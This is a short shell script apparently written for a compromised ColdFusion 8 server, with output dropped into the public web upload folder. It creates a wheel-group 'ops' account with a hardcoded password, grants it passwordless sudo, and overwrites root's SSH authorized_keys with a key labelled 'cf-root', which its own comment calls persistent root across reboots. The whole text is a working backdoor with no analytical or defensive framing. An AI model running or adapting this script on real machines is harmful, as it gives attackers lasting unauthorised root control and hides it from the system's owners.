#!/bin/sh # restore ops sudoer + root SSH key (persistent root across reboots) WEB=/opt/coldfusion8/wwwroot/userfiles/file O=$WEB/restore_ops.txt { echo "== id ops before ==" id ops 2>&1 # recreate ops (uid 10025, wheel) useradd -u 10025 -G wheel -s /bin/bash ops 2>&1 echo 'ops:P@ssw0rd!' | chpasswd grep -q '^ops' /etc/sudoers || echo 'ops ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers # root ssh key mkdir -p /root/.ssh chmod 700 /root/.ssh cat > /root/.ssh/authorized_keys <<'KEYEOF' ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABALBYeV3wXAUo9S08a/ULL27dN+yLYQyZX504FJvioka59maf6hgjRRvnwg7waTLDAaR1LsS/ppUyF+RcsuE5cQdClDUM6AMuxeHnxpSjlFsV1gySGN9KsGbR4VWsM4c/Y0tDIrvHc6mfJaAlMLLpSwWm0gFOdtLFgOtNrjnDsDLpPTZdsP6mkwK4Ng7dlrt1Hsde1IC/CmnEdoRUYyn+kUL5LQGHwr+3OyP3r8oFzdvGTy5YinU/jislLhNOj/ZEJCTMHcXNEdPLSHjHGAXpMB/G2sa9T057PEw5/TYZuab4G4eOXKdj7XvtZKSCWfcUgTrTTLVcjyoPdzm3znOrrTE= cf-root KEYEOF chmod 600 /root/.ssh/authorized_keys echo "== verify ==" id ops tail -2 /etc/sudoers ls -la /root/.ssh } > $O 2>&1 cat $O